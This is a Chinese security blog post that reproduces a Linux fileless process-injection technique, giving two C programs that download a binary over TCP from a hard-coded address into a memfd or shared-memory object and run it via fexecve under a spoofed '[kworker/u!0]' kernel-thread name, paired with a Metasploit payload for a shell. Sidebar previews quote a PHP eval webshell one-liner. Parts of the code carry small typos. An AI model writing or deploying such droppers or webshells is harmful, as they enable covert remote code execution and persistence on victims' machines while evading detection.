linux无文件进程注入

本文是对 Super-Stealthy Droppers的复现,测试发现代码有些bug,在远程利用时会问题,稍作完善了下。

memfd_create + fexecve 
memfd_create需要 kernel 3.17以上,fexecve需要2.3.2以上
#include <stdio.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#define __NR_memfd_create 319
#define MFD_CLOEXEC 1
static inline int memfd_create(const char *name, unsigned int flags) {
    return syscall(__NR_memfd_create, name, flags);
}
extern char        **environ;
int main (int argc, char **argv) {
  int                fd, s;
  unsigned long      addr = 0x0100007f11110002;
  char               *args[2]= {"[kworker/u!0]", NULL};
  char               buf[1024];
  int              num;
  // Connect
  if ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) exit (1);
  if (connect (s, (struct sockaddr*)&addr, 16) < 0) exit (1);
  if ((fd = memfd_create("a", MFD_CLOEXEC)) < 0) exit (1);
  while (1) {
      if ((num = read (s, buf, 1024) ) <= 0break;
      write (fd, buf, num);
    }
  close (s);
   
  if (fexecve (fd, args, environ) < 0) exit (1);
  return 0;
     
}
编译运行
evil: msf程序
拿到shell 
低版本的情况下可用如下:
#include <stdio.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <sys/mman.h>
int
my_fexecve (int fd, char **arg, char **env) {
  char  fname[1024];
  snprintf (fname, 1024"/proc/%d/fd/%d", getpid(), fd);
  execve (fname, arg, env);
  return 0;
}
extern char        **environ;
int main (int argc, char **argv) {
  int                fd, s;
  unsigned long      addr = 0x0100007f11110002;
  char               *args[2]= {"[kworker/u!0]", NULL};
  char               buf[1024];
  int                num;
  // Connect
  if ((s = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) exit (1);
  if (connect (s, (struct sockaddr*)&addr, 16) < 0) exit (1);
  if ((fd = shm_open("a", O_RDWR | O_CREAT, S_IRWXU)) < 0) exit (1);
   
  while (1) {
      if ((num = read (s, buf, 1024) ) <= 0break;
      write (fd, buf, num);
    }
  close (s);
  close (fd);
  if ((fd = shm_open("a", O_RDONLY, 0)) < 0) exit (1);
   
   
  if (my_fexecve (fd, args, environ) < 0) exit (1);
  return 0;
     
}
编译命令: gcc -o program  program.c -lrt


评论

发表评论

此博客中的热门博文

菜刀连接php一句话木马返回200的原因及解决方法

图片
    一句话木马的内容为“<?php @eval($_POST["abc"])?>”,用菜刀连接直接返回200          可是hackbar中执行命令却没有问题          很奇怪。后来在看雪上看到也有人发类似的 帖子 ,评论有人提到是php7版本过高的问题,搜了下确实是这样,php manual 中提到: Dynamic calls for certain functions have been forbidden (in the form of $func() or array_map('extract', ...), etc). These functions either inspect or modify another scope, and present with them ambiguous and unreliable behavior. The functions are as follows: assert() - with a string as the first argument      即php7中动态调用一些函数是被禁止的,比如在array_map中调用assert,否则会提示      Warning: Cannot call func_num_args() dynamically in %s on line %d     把一句话里的@符号去掉,则同样会报错“Cannot call assert() with string argument dynamically in ...shell.php(1) : eval()'d code on line 1 ”。       从返回内容可以看到php版本为7.1.6。抓包看了下菜刀的发包,的确用到了array_map("assert"..)          所以只要在菜刀的配置文件里把  array_map("a...
阅读全文

vultr安装kali linux 折腾笔记

图片
    打算在vultr上安装kali linux 2017.1 64位,可是安装完重启后kali又进入了安装界面,后来查到网上说系统安装到“finish the installation”这步时,移除ISO文件,避免再次从光盘启动,可是移除ISO重启后一直卡在启动界面,黑屏并提示“booting from disk”,重新安装多少次都无效。     一度怀疑kali 没有成功安装grub。搜索发现 How to set NOMODESET and other kernel boot options in grub2  提到最新的linux把视频模式集成到了内核中,但是一些视频卡有问题会导致黑屏,解决方式就是添加nomodeset参数让内核不去加载视频驱动而是使用bios模式直到X驱动加载完,也提到可以启动时按“e”来编辑grub配置。  The newest kernels have moved the video mode setting into the kernel. So all the programming of the hardware specific clock rates and registers on the video card happen in the kernel rather than in the X driver when the X server starts.. This makes it possible to have high resolution nice looking splash (boot) screens and flicker free transitions from boot splash to login screen. Unfortunately, on some cards this doesnt work properly and you end up with a black screen. Adding the nomodeset parameter instructs the kernel to not load video drivers and use BIOS modes instead until X is loa...
阅读全文

phpstorm使用xdebug调试无法进入断点的解决“方法”

图片
    按照网上的文章安装好xdebug浏览器插件、配置好php.ini(启用xdebug dll等)、配置好phpstorm后,发现设置了断点却无效。有人提到是端口的问题,通过在php.ini(添加 xdebug.remote_log="D:\xxxx\xdebug.log")中启用xdebug log日志发现确实是端口的问题。日志报错如下: I: Connecting to configured address/port: localhost  #指定远程调试的主机名:9000. W: Creating socket for 'localhost  #指定远程调试的主机名:9000', getaddrinfo: 11001. E: Could not connect to client. :-(     debug与FastCGI 冲突了,所以php.ini中把端口改为非9000端口即可,如xdebug.remote_port = 9001,phpstorm里也跟着改端口,但是还是无法中断。也有人说在php.ini中加上xdebug.remote_autostart = 1 即可,实测无效(后来能中断后发现这句话确实不起作用)。     正当一脸懵逼的时候,点了下“Run”->"debug"->"phpinfo.php(PHP Script)"->"debug" (当时正想在phpinfo.php这个文件上下断点)。     这个其实是本地调试,可以中断的,然后惊奇地发现之前不能再浏览器中中断的断点竟然也能中断了。。。。不是很懂,但问题就这么解决了。。。老实讲这应该不算解决方法,很玄学。。。
阅读全文